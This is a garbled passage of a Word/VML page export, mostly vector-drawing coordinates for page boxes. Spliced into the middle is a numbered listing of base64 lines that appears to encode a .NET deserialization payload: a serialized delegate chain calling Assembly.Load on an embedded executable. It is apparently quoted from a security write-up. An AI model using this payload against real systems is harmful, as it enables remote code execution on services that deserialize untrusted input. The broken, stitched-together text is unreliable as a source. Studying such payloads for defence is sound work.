731,2878,14731,2877,14731,2875,14731,2874,14731,2873,14731,2872,14731,2870,14731,2869,14731,2868,14731,2866,14731,2865,14731,2863,14731,2862,14731,2860,14731,2859,14731,2857,14731,2855,14731,2854,14731,2852,14731,2850,14731,2848,14731,2846,14731,2844,14731,2842,14731,2840,14731,2838,14731,2836,14731,2834,14731,2832,14731,2830,14731,2828,14731,2825,14731,2823,14731,2821,14731,2818,14731,2816,14731,2813,14731,2811,14731,2808,14731,2805,14731,2803,14731,2800,14731,2797,14731,2794,14731,2791,14731,2788,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14731,2785,14730,2785,14730,2785,14730,2785,14730,2785,14730,2785,14729,2785,14729,2785,14729,2785,14728,2785,14728,2785,14728,2785,14727,2785,14727,2785,14726,2785,14726,2785,14725,2785,14725,2785,14724,2785,14724,2785,14723,2785,14722,2785,14722,2785,14721,2785,14720,2785,14719,2785,14719,2785,14718,2785,14717,2785,14716,2785,14715,2785,14714,2785,14712,2785,14711,2785,14710,2785,14709,2785,14708,2785,14706,2785,14705,2785,14703,2785,14702,2785,14700,2785,14699,2785,14697,2785,14695,2785,14694,2785,14692,2785,14690,2785,14688,2785,14686,2785,14684,2785,14682,2785,14679,2785,14677,2785,14675,2785,14673,2785,14670,2785,14668,2785,14665,2785,14662,2785,14660,2785,14657,2785,14654,2785,14651,2785,14648,2785,14645,2785,14642,2785,14638,2785,14635,2785,14632,2785,14628,2785,14625,2785,14621,2785,14617,2785,14614,2785,14610,2785,14606,2785,14602,2785,14597,2785,14593,2785,14589,2785,14585,2785,14580,2785,14575,2785,14571,2785,14566,2785,14561,2785,14556,2785,14551,2785,14546,2785,14541,2785,14535,2785,14530,2785,14524,2785,14519,2785,14513,2785,14507,2785,14501,2785,14495,2785,14489,2785,14483,2785,14476e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:754.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,15090" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:15090;width:130;height:270" coordorigin="2290,15090" coordsize="130,270" path="m2305,15107l2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2305,15107,2306,15107,2306,15107,2306,15107,2306,15107,2306,15107,2306,15107,2306,15107,2306,15107,2306,15107,2306,15107,2307,15107,2307,15107,2307,15107,2307,15107,2307,15107,2307,15107,2308,15107,2308,15107,2308,15107,2308,15107,2309,15107,2309,15107,2309,15107,2310,15107,2310,15107,2310,15107,2311,15107,2311,15107,2312,15107,2312,15107,2313,15107,2313,15107,2314,15107,2314,15107,2315,15107,2315,15107,2316,15107,2316,15107,2317,15107,2318,15107,2318,15107,2319,15107,2320,15107,2321,15107,2321,15107,2322,15107,2323,15107,2324,15107,2325,15107,2326,15107,2327,15107,2328,15107,2329,15107,2330,15107,2331,15107,2332,15107,2333,15107,2334,15107,2335,15107,2336,15107,2338,15107,2339,15107,2340,15107,2342,15107,2343,15107,2344,15107,2346,15107,2347,15107,2349,15107,2350,15107,2352,15107,2354,15107,2355,15107,2357,15107,2359,15107,2361,15107,2362,15107,2364,15107,2366,15107,2368,15107,2370,15107,2372,15107,2374,15107,2376,15107,2379,15107,2381,15107,2383,15107,2385,15107,2388,15107,2390,15107,2392,15107,2395,15107,2397,15107,2400,15107,2403,15107,2405,15107,2408,15107,2411,15107,2414,15107,2416,15107,2419,15107,2422,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15107,2425,15108,2425,15108,2425,15108,2425,15108,2425,15108,2425,15109,2425,15109,2425,15109,2425,15110,2425,15110,2425,15110,2425,15111,2425,15111,2425,15112,2425,15112,2425,15113,2425,15113,2425,15114,2425,15114,2425,15115,2425,15116,2425,15116,2425,15117,2425,15118,2425,15119,2425,15120,2425,15120,2425,15121,2425,15122,2425,15123,2425,15124,2425,15126,2425,15127,2425,15128,2425,15129,2425,15130,2425,15132,2425,15133,2425,15135,2425,15136,2425,15138,2425,15139,2425,15141,2425,15143,2425,15144,2425,15146,2425,15148,2425,15150,2425,15152,2425,15154,2425,15156,2425,15159,2425,15161,2425,15163,2425,15166,2425,15168,2425,15170,2425,15173,2425,15176,2425,15178,2425,15181,2425,15184,2425,15187,2425,15190,2425,15193,2425,15196,2425,15200,2425,15203,2425,15206,2425,15210,2425,15213,2425,15217,2425,15221,2425,15225,2425,15228,2425,15232,2425,15236,2425,15241,2425,15245,2425,15249,2425,15254,2425,15258,2425,15263,2425,15267,2425,15272,2425,15277,2425,15282,2425,15287,2425,15292,2425,15297,2425,15303,2425,15308,2425,15314,2425,15319,2425,15325,2425,15331,2425,15337,2425,15343,2425,15349,2425,15355,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2425,15362,2424,15362,2424,15362,2424,15362,2424,15362,2424,15362,2424,15362,2424,15362,2423,15362,2423,15362,2423,15362,2423,15362,2423,15362,2422,15362,2422,15362,2422,15362,2422,15362,2421,15362,2421,15362,2421,15362,2420,15362,2420,15362,2420,15362,2419,15362,2419,15362,2418,15362,2418,15362,2417,15362,2417,15362,2416,15362,2416,15362,2415,15362,2415,15362,2414,15362,2413,15362,2413,15362,2412,15362,2411,15362,2411,15362,2410,15362,2409,15362,2408,15362,2407,15362,2407,15362,2406,15362,2405,15362,2404,15362,2403,15362,2402,15362,2401,15362,2400,15362,2399,15362,2398,15362,2396,15362,2395,15362,2394,15362,2393,15362,2391,15362,2390,15362,2389,15362,2387,15362,2386,15362,2384,15362,2383,15362,2381,15362,2380,15362,2378,15362,2377,15362,2375,15362,2373,15362,2372,15362,2370,15362,2368,15362,2366,15362,2364,15362,2362,15362,2360,15362,2358,15362,2356,15362,2354,15362,2352,15362,2350,15362,2347,15362,2345,15362,2343,15362,2340,15362,2338,15362,2335,15362,2333,15362,2330,15362,2328,15362,2325,15362,2322,15362,2320,15362,2317,15362,2314,15362,2311,15362,2308,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15362,2305,15361,2305,15361,2305,15361,2305,15361,2305,15361,2305,15361,2305,15361,2305,15361,2305,15361,2305,15360,2305,15360,2305,15360,2305,15360,2305,15359,2305,15359,2305,15359,2305,15358,2305,15358,2305,15358,2305,15357,2305,15357,2305,15356,2305,15356,2305,15355,2305,15355,2305,15354,2305,15353,2305,15353,2305,15352,2305,15351,2305,15351,2305,15350,2305,15349,2305,15348,2305,15347,2305,15346,2305,15345,2305,15344,2305,15343,2305,15342,2305,15340,2305,15339,2305,15338,2305,15337,2305,15335,2305,15334,2305,15332,2305,15331,2305,15329,2305,15327,2305,15326,2305,15324,2305,15322,2305,15320,2305,15318,2305,15316,2305,15314,2305,15312,2305,15310,2305,15308,2305,15305,2305,15303,2305,15300,2305,15298,2305,15295,2305,15293,2305,15290,2305,15287,2305,15284,2305,15281,2305,15278,2305,15275,2305,15272,2305,15269,2305,15265,2305,15262,2305,15259,2305,15255,2305,15251,2305,15248,2305,15244,2305,15240,2305,15236,2305,15232,2305,15228,2305,15224,2305,15219,2305,15215,2305,15210,2305,15206,2305,15201,2305,15196,2305,15191,2305,15186,2305,15181,2305,15176,2305,15171,2305,15166,2305,15160,2305,15155,2305,15149,2305,15143,2305,15137,2305,15131,2305,15125,2305,15119,2305,15113,2305,15107e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:754.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,15090" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:15090;width:130;height:270" coordorigin="2770,15090" coordsize="130,270" path="m2785,15107l2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2785,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2786,15107,2787,15107,2787,15107,2787,15107,2787,15107,2787,15107,2787,15107,2788,15107,2788,15107,2788,15107,2788,15107,2788,15107,2789,15107,2789,15107,2789,15107,2790,15107,2790,15107,2790,15107,2791,15107,2791,15107,2791,15107,2792,15107,2792,15107,2793,15107,2793,15107,2794,15107,2794,15107,2795,15107,2795,15107,2796,15107,2797,15107,2797,15107,2798,15107,2799,15107,2799,15107,2800,15107,2801,15107,2802,15107,2802,15107,2803,15107,2804,15107,2805,15107,2806,15107,2807,15107,2808,15107,2809,15107,2810,15107,2811,15107,2812,15107,2813,15107,2814,15107,2815,15107,2817,15107,2818,15107,2819,15107,2821,15107,2822,15107,2823,15107,2825,15107,2826,15107,2828,15107,2829,15107,2831,15107,2832,15107,2834,15107,2836,15107,2837,15107,2839,15107,2841,15107,2843,15107,2845,15107,2846,15107,2848,15107,2850,15107,2852,15107,2855,15107,2857,15107,2859,15107,2861,15107,2863,15107,2866,15107,2868,15107,2870,15107,2873,15107,2875,15107,2878,15107,2880,15107,2883,15107,2885,15107,2888,15107,2891,15107,2894,15107,2897,15107,2900,15107,2902,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15107,2905,15108,2905,15108,2905,15108,2905,15108,2905,15108,2905,15109,2905,15109,2905,15109,2905,15110,2905,15110,2905,15110,2905,15111,2905,15111,2905,15112,2905,15112,2905,15113,2905,15113,2905,15114,2905,15114,2905,15115,2905,15116,2905,15116,2905,15117,2905,15118,2905,15119,2905,15120,2905,15120,2905,15121,2905,15122,2905,15123,2905,15124,2905,15126,2905,15127,2905,15128,2905,15129,2905,15130,2905,15132,2905,15133,2905,15135,2905,15136,2905,15138,2905,15139,2905,15141,2905,15143,2905,15144,2905,15146,2905,15148,2905,15150,2905,15152,2905,15154,2905,15156,2905,15159,2905,15161,2905,15163,2905,15166,2905,15168,2905,15170,2905,15173,2905,15176,2905,15178,2905,15181,2905,15184,2905,15187,2905,15190,2905,15193,2905,15196,2905,15200,2905,15203,2905,15206,2905,15210,2905,15213,2905,15217,2905,15221,2905,15225,2905,15228,2905,15232,2905,15236,2905,15241,2905,15245,2905,15249,2905,15254,2905,15258,2905,15263,2905,15267,2905,15272,2905,15277,2905,15282,2905,15287,2905,15292,2905,15297,2905,15303,2905,15308,2905,15314,2905,15319,2905,15325,2905,15331,2905,15337,2905,15343,2905,15349,2905,15355,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2905,15362,2904,15362,2904,15362,2904,15362,2904,15362,2904,15362,2904,15362,2904,15362,2903,15362,2903,15362,2903,15362,2903,15362,2902,15362,2902,15362,2902,15362,2902,15362,2901,15362,2901,15362,2901,15362,2900,15362,2900,15362,2899,15362,2899,15362,2899,15362,2898,15362,2898,15362,2897,15362,2897,15362,2896,15362,2895,15362,2895,15362,2894,15362,2894,15362,2893,15362,2892,15362,2892,15362,2891,15362,2890,15362,2889,15362,2888,15362,2888,15362,2887,15362,2886,15362,2885,15362,2884,15362,2883,15362,2882,15362,2881,15362,2880,15362,2879,15362,2878,15362,2877,15362,2875,15362,2874,15362,2873,15362,2872,15362,2870,15362,2869,15362,2868,15362,2866,15362,2865,15362,2863,15362,2862,15362,2860,15362,2859,15362,2857,15362,2855,15362,2854,15362,2852,15362,2850,15362,2848,15362,2846,15362,2844,15362,2842,15362,2840,15362,2838,15362,2836,15362,2834,15362,2832,15362,2830,15362,2828,15362,2825,15362,2823,15362,2821,15362,2818,15362,2816,15362,2813,15362,2811,15362,2808,15362,2805,15362,2803,15362,2800,15362,2797,15362,2794,15362,2791,15362,2788,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15362,2785,15361,2785,15361,2785,15361,2785,15361,2785,15361,2785,15361,2785,15361,2785,15361,2785,15361,2785,15360,2785,15360,2785,15360,2785,15360,2785,15359,2785,15359,2785,15359,2785,15358,2785,15358,2785,15358,2785,15357,2785,15357,2785,15356,2785,15356,2785,15355,2785,15355,2785,15354,2785,15353,2785,15353,2785,15352,2785,15351,2785,15351,2785,15350,2785,15349,2785,15348,2785,15347,2785,15346,2785,15345,2785,15344,2785,15343,2785,15342,2785,15340,2785,15339,2785,15338,2785,15337,2785,15335,2785,15334,2785,15332,2785,15331,2785,15329,2785,15327,2785,15326,2785,15324,2785,15322,2785,15320,2785,15318,2785,15316,2785,15314,2785,15312,2785,15310,2785,15308,2785,15305,2785,15303,2785,15300,2785,15298,2785,15295,2785,15293,2785,15290,2785,15287,2785,15284,2785,15281,2785,15278,2785,15275,2785,15272,2785,15269,2785,15265,2785,15262,2785,15259,2785,15255,2785,15251,2785,15248,2785,15244,2785,15240,2785,15236,2785,15232,2785,15228,2785,15224,2785,15219,2785,15215,2785,15210,2785,15206,2785,15201,2785,15196,2785,15191,2785,15186,2785,15181,2785,15176,2785,15171,2785,15166,2785,15160,2785,15155,2785,15149,2785,15143,2785,15137,2785,15131,2785,15125,2785,15119,2785,15113,2785,15107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16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41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"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0d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XJlC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k1lbWJlclR5"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42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"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAAC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QYAA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AAJCQAAAAYR"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43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"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W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10pC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AAAAAoBCwAA"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44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"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTA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AAAT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VN5c3RlbS5Y"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45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"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZ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XlUb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2tlbj1iNzdh"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46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"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZ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mxlY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3Rpb24uQXNz"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47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"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAA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AAAA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ABAAAAAAAAA"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48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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMz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SFUa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GlzIHByb2dy"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49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"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMA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QMAk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NhXWQAAAAAA"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50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"AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACA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AAEA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AAAAAAAAAQA"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51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"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAA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AAAA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AAAAAAAIDUA"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52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"AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAA"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53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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAII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AAAS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AAAAAAAAAAA"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54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"AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc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3JjA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AAAkAMAAABA"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55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"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAA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AAcA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AAAAAAAAAAA"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56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"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAK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BMAA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AEAAAAAAAAA"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57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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAH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gIoDwAACioT"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58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"MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAc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BMEc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gMAAHAoEgAA"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59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"Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQ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QAAc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AMoFAAAChME"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60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"EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAA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Aosb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hEFFnMRAAAK"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61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"ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWE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wcSC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AaOaSgRAAAK"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62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"EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmK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noCf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hUAAAp9AgAA"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63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"BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEA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n4VA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AAKfSwAAAQC"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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:630" coordorigin="1490,1630" coordsize="8990,630" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,